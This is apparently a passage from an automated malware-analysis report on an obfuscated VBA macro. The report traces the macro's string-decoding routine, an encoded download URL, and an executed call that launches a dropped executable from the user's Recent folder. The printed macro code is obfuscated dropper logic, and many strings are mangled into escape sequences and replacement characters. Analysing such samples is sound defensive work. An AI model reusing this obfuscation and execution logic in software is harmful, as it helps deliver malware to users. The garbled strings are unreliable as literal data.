                                              \xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf.Open (\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8)

                                              IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe")

                                              executed
                                              72

                                              End Sub

                                              Non-Executed Functions

                                              Function

                                              \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbdAPIs: 5, Strings: 2, Number of lines: 14, Relevance: 22.014

                                              APIsMeta Information

                                              Len

                                              		Len("\V\xfffdZVQX\xfffd\xfffdT.\xfffd\xfffd\xfffd") -> 14 Len("h\xfffd\xfffd\xfffd\xfffd://www.\xfffd\xfffd\xfffd\xfffd\xfffdm\xfffd\xfffd\xfffd.\xfffd\xfffdm/\xfffddj\xfffdg\xfffd\xfffdzlk\xfffd\xfffdk\xfffdzk\xfffd\xfffdg\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdNbg\xfffd\xfffdgg\xfffd\xfffdh\xfffd/d\xfffdhd\xfffd\xfffdjd\xfffd\xfffd\xfffdj\xfffd\xfffd\xfffd\xfffdw\xfffdw\xfffdw\xfffd\xfffd\xfffd\xfffdgh\xfffdd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdw\xfffdw\xfffd\xfffd\xfffd\xfffd/\xfffdg\xfffd\xfffdd\xfffdh\xfffd\xfffdjh\xfffd\xfffdjgh\xfffd\xfffdg\xfffd\xfffd\xfffdg\xfffd\xfffdj\xfffdhd\xfffdh\xfffd\xfffd\xfffdh/\xfffdd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdg\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdz/\xfffd\xfffd\xfffdh\xfffdzdhhz.\xfffd\xfffd\xfffd") -> 179

                                              InStr

                                              		InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","V") -> 77 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 107 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","Z") -> 81 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","Q") -> 72 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","X") -> 79 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 102 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 109 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","T") -> 75 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",".") -> 52 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 88 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 98 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","h") -> 33 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 96 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 93 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 95 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",":") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","/") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","w") -> 48 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 90 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 86 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","m") -> 38 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 91 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 87 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 92 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","d") -> 29 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","j") -> 35 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 89 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","g") -> 32 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","z") -> 51 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","l") -> 37 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","k") -> 36 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","N") -> 69 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","b") -> 27 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 94 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 99

                                              Mid

                                              Mid

                                              Mid

                                              StringsDecrypted Strings
                                              " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"
                                              " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"
                                              LineInstructionMeta Information
                                              9

                                              Function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd(\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6)

                                              10

                                              \xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"

                                              11

                                              \xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3 = " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"

                                              12

                                              For u = 1 To Len(\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6)

                                              Len("\V\xfffdZVQX\xfffd\xfffdT.\xfffd\xfffd\xfffd") -> 14

                                              executed
                                              13

                                              \xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae = InStr(\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb, Mid(\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6, u, 1))

                                              InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0

                                              Mid

                                              executed
                                              14

                                              If \xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae > 0 Then

                                              15

                                              \xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7 = Mid(\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3, 